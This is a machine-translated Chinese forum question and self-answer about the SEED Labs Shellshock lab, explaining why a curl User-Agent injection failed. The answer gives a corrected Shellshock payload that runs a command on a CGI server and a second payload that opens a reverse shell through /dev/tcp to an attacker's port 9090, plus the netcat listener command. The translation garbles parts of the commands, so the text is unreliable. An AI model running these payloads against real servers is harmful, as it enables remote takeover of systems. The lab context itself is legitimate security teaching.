我尝试解决种子实验室外壳冲击漏洞实验室,我用bellow命令设置代理字段 Curl -A“(){echo hello;}; Content_type:text / plain; echo; / bin / ls -l”http://localhost/cgi-bin/sample.cgi
输出仍然是放在cgi脚本中的问候语
我通过检查环境变量来测试代理字段。它被设置为我的命令但没有被执行?关于为什么bash没有解析这个功能的任何建议 提前谢谢
答案 0 :(得分:0)
我终于得到了答案,这是因为语法错误。 正确的语法是这样的: 卷曲-A'(){:;}; Content_type:text / plain;回声; / bin / ls -l' 而对于运行反向shell的bash命令是这样的: 卷曲-A'(){:;}; $(/ bin / bash -i> / dev / tcp / your ip / 9090 2>& 1 0>& 1'
http://yourwebsiteadrress/cgi-bin/your cgi file
不要忘记让你的机器首先听到9090,当然是在新的终端
nc -l 9090 -v
然后你有反向壳